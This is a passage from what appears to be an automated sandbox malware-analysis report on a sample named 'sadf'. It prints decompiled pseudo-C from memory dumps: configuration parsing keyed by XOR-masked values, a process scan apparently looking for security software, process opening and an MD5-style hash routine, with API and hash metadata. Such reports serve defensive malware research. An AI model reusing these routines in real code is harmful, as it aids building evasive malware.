						_t48 = E008C2A59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x8ca004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x8ca344; // 0x69b25f44
						_t49 = E008C2A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x8ca02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x8ca344; // 0x69b25f44
						_t50 = E008C2A59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x8ca2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x8ca344; // 0x69b25f44
								_t51 = E008C2A59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E008C18F5(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E008C731D();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x8ca344; // 0x69b25f44
								_t52 = E008C2A59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E008C18F5(0, _t52) != 0) {
								_t121 =  *0x8ca3cc; // 0x1309600
								E008C3D80(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x8ca344; // 0x69b25f44
								_t53 = E008C2A59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x8ca348; // 0xa3d5a8
								_t22 = _t54 + 0x8cb252; // 0x616d692f
								 *0x8ca370 = _t22;
								goto L60;
							} else {
								_t64 = E008C18F5(0, _t53);
								 *0x8ca370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x8ca344; // 0x69b25f44
										_t56 = E008C2A59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x8ca348; // 0xa3d5a8
										_t23 = _t57 + 0x8cb79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E008C18F5(0, _t56);
									}
									 *0x8ca3e0 = _t58;
									HeapFree( *0x8ca2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x008c2792
0x008c2792
0x008c2792
0x008c2792
0x008c2795
0x008c27b2
0x008c27c0
0x008c27c0
0x008c27c5
0x008c27df
0x008c2a4d
0x008c2a54
0x008c2a58
0x008c2a58
0x008c27e5
0x008c27ea
0x008c2802
0x008c2a3a
0x008c2a44
0x00000000
0x008c2808
0x008c2808
0x008c2809
0x008c280e
0x008c2824
0x008c2810
0x008c2810
0x008c281d
0x008c281d
0x008c2826
0x008c282f
0x008c2831
0x008c283b
0x008c2840
0x008c2840
0x008c283b
0x008c2847
0x008c285d
0x008c2849
0x008c2849
0x008c2856
0x008c2856
0x008c2861
0x008c2863
0x008c286d
0x008c2872
0x008c2872
0x008c286d
0x008c2879
0x008c288f
0x008c287b
0x008c287b
0x008c2888
0x008c2888
0x008c2893
0x008c2895
0x008c289f
0x008c28a4
0x008c28a4
0x008c289f
0x008c28ab
0x008c28c1
0x008c28ad
0x008c28ad
0x008c28ba
0x008c28ba
0x008c28c5
0x008c28c7
0x008c28d1
0x008c28d6
0x008c28d6
0x008c28d1
0x008c28dd
0x008c28f3
0x008c28df
0x008c28df
0x008c28ec
0x008c28ec
0x008c28f7
0x008c28f9
0x008c2903
0x008c2908
0x008c2908
0x008c2903
0x008c290f
0x008c2925
0x008c2911
0x008c2911
0x008c291e
0x008c291e
0x008c2929
0x008c293c
0x008c293c
0x00000000
0x008c292b
0x008c292b
0x008c2935
0x00000000
0x008c2946
0x008c2946
0x008c2948
0x008c295e
0x008c294a
0x008c294a
0x008c2957
0x008c2957
0x008c2962
0x008c2964
0x008c2967
0x008c2968
0x008c296f
0x008c2971
0x008c2972
0x008c2972
0x008c296f
0x008c2979
0x008c298f
0x008c297b
0x008c297b
0x008c2988
0x008c2988
0x008c2993
0x008c29a1
0x008c29ab
0x008c29ab
0x008c29b3
0x008c29c9
0x008c29b5
0x008c29b5
0x008c29c2
0x008c29c2
0x008c29cd
0x008c29e0
0x008c29e0
0x008c29e5
0x008c29eb
0x00000000
0x008c29cf
0x008c29d2
0x008c29d7
0x008c29de
0x008c29f0
0x008c29f2
0x008c2a08
0x008c29f4
0x008c29f4
0x008c2a01
0x008c2a01
0x008c2a0c
0x008c2a18
0x008c2a1d
0x008c2a1d
0x008c2a0e
0x008c2a11
0x008c2a11
0x008c2a2b
0x008c2a30
0x008c2a36
0x00000000
0x008c2a39
0x00000000
0x008c29de
0x008c29cd
0x008c2935
0x008c2929

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C2837
StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C2869
StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C289B
StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C28CD
StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C28FF
StrToIntExA.SHLWAPI(00000000,00000000,?,008CA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 008C2931
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 008C2A30
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 008C2A44

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 53975963dc94754abb0a2c17e0b8999823722ac2b8fb1fce862e1f29a3a4bd3c
Instruction ID: 9165645e2a9791949e4e35ac157cc81b63e9b4f01a5434e2992eb94c34325af6
Opcode Fuzzy Hash: 53975963dc94754abb0a2c17e0b8999823722ac2b8fb1fce862e1f29a3a4bd3c
Instruction Fuzzy Hash: BF81A270A10618EBCB14EBB8DD88F6B7BB9FB48704B24093DB401D7295EA35DD458B62

Uniqueness

Uniqueness Score: -1.00%

Function 008C7256 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E008C7256() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x8ca348; // 0xa3d5a8
						_t2 = _t9 + 0x8cbea8; // 0x73617661
						_push( &_v264);
						if( *0x8ca12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x008c7261
0x008c726b
0x008c726f
0x008c7279
0x008c72aa
0x008c7280
0x008c7285
0x008c7292
0x008c729b
0x008c72b2
0x008c729d
0x008c72a5
0x00000000
0x008c72a5
0x008c72b3
0x008c72b4
0x00000000
0x008c72b4
0x00000000
0x008c72ae
0x008c72ba
0x008c72bf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008C7266
Process32First.KERNEL32(00000000,?), ref: 008C7279
Process32Next.KERNEL32(00000000,?), ref: 008C72A5
CloseHandle.KERNEL32(00000000), ref: 008C72B4

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a03a86d66212ef58e0ae8807dc06816c5df909552a3d45576d7d715cf03b2747
Instruction ID: 9e21dc6bda5d673b4e96ae778a4ba5d441e81ce9bf2c52e55e7128d1c747a57d
Opcode Fuzzy Hash: a03a86d66212ef58e0ae8807dc06816c5df909552a3d45576d7d715cf03b2747
Instruction Fuzzy Hash: 6CF0BB326041286ADB21A7769C4DFEB767CFFC5755F040099FA47D3101E630CA468AB2

Uniqueness

Uniqueness Score: -1.00%

Function 004012B0 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012B0() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x403170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40317c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40316c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x403168 = _t5;
						 *0x403170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x403164 = _t6;
						if(_t6 == 0) {
							 *0x403164 =  *0x403164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x004012b1
0x004012bf
0x004012c5
0x004012cc
0x00401323
0x00401323
0x004012ce
0x004012d6
0x004012e3
0x004012e3
0x0040131f
0x00401321
0x00000000
0x00000000
0x00000000
0x004012d8
0x004012df
0x004012e5
0x004012e5
0x004012ea
0x004012f8
0x004012fd
0x00401303
0x00401309
0x00401310
0x00401312
0x00401312
0x0040131c
0x004012e1
0x004012e1
0x00000000
0x004012e1
0x004012df

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
GetVersion.KERNEL32 ref: 004012CE
GetCurrentProcessId.KERNEL32 ref: 004012EA
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
Instruction ID: b8cc09b8ad51b93fadf4e457bac6bf592bf8967fcaec5ad48abf734a1226aae7
Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
Instruction Fuzzy Hash: 4EF019309403019BE7209FB8BE1DB963BA9A749712F14017AE651FA2F0D7B48A41CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 008C2DCC Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E008C2DCC(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x008c2dcf
0x008c2dda
0x008c2ddd
0x008c2de0
0x008c2de1
0x008c2dff
0x008c2e01
0x008c2e04
0x008c2e07
0x008c2e07
0x008c2e0a
0x008c2e0a
0x008c2e0d
0x008c2e0d
0x008c2e10
0x008c2e10
0x008c2e2d
0x008c2e30
0x008c2e46
0x008c2e49
0x008c2e63
0x008c2e66
0x008c2e7c
0x008c2e7f
0x008c2e81
0x008c2e99
0x008c2e9c
0x008c2e9f
0x008c2eb7
0x008c2eba
0x008c2ed4
0x008c2ed7
0x008c2eed
0x008c2ef0
0x008c2ef2
0x008c2f0a
0x008c2f0f
0x008c2f12
0x008c2f28
0x008c2f2b
0x008c2f45
0x008c2f48
0x008c2f5e
0x008c2f61
0x008c2f63
0x008c2f7e
0x008c2f81
0x008c2f98
0x008c2f9b
0x008c2f9f
0x008c2fb8
0x008c2fbb
0x008c2fbd
0x008c2fc0
0x008c2fdb
0x008c2fde
0x008c2ff7
0x008c2ffa
0x008c300a
0x008c300d
0x008c3025
0x008c3028
0x008c3042
0x008c3045
0x008c305d
0x008c3060
0x008c3076
0x008c3079
0x008c3091
0x008c3094
0x008c30ac
0x008c30af
0x008c30c9
0x008c30cc
0x008c30e2
0x008c30e5
0x008c30fd
0x008c3100
0x008c311a
0x008c311d
0x008c3135
0x008c3138
0x008c314e
0x008c3151
0x008c3169
0x008c316c
0x008c3184
0x008c3187
0x008c3199
0x008c319c
0x008c31ae
0x008c31b1
0x008c31c3
0x008c31c6
0x008c31ca
0x008c31da
0x008c31dd
0x008c31eb
0x008c31ee
0x008c3200
0x008c3203
0x008c3217
0x008c321a
0x008c321c
0x008c322c
0x008c322f
0x008c3241
0x008c3244
0x008c3252
0x008c3255
0x008c3267
0x008c326a
0x008c326e
0x008c327e
0x008c3281
0x008c3293
0x008c3296
0x008c32a4
0x008c32a7
0x008c32b9
0x008c32bc
0x008c32ce
0x008c32d1
0x008c32e5
0x008c32e8
0x008c32fc
0x008c32ff
0x008c3313
0x008c3316
0x008c332a
0x008c332d
0x008c3341
0x008c3344
0x008c3358
0x008c335d
0x008c336f
0x008c3372
0x008c3386
0x008c3389
0x008c339d
0x008c33a0
0x008c33b6
0x008c33b9
0x008c33cd
0x008c33d0
0x008c33e2
0x008c33e5
0x008c33f9
0x008c33fc
0x008c3410
0x008c3413
0x008c3427
0x008c3430
0x008c3433
0x008c343c
0x008c3445
0x008c344d
0x008c3455
0x008c345f
0x008c3474

APIs

memset.NTDLL ref: 008C3468

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
Instruction ID: 36def65eac4aba3388337412fea6216b6af66504a26aad86b026715a53a45d48
Opcode Fuzzy Hash: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
Instruction Fuzzy Hash: BB22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 008C8521 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C8521(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
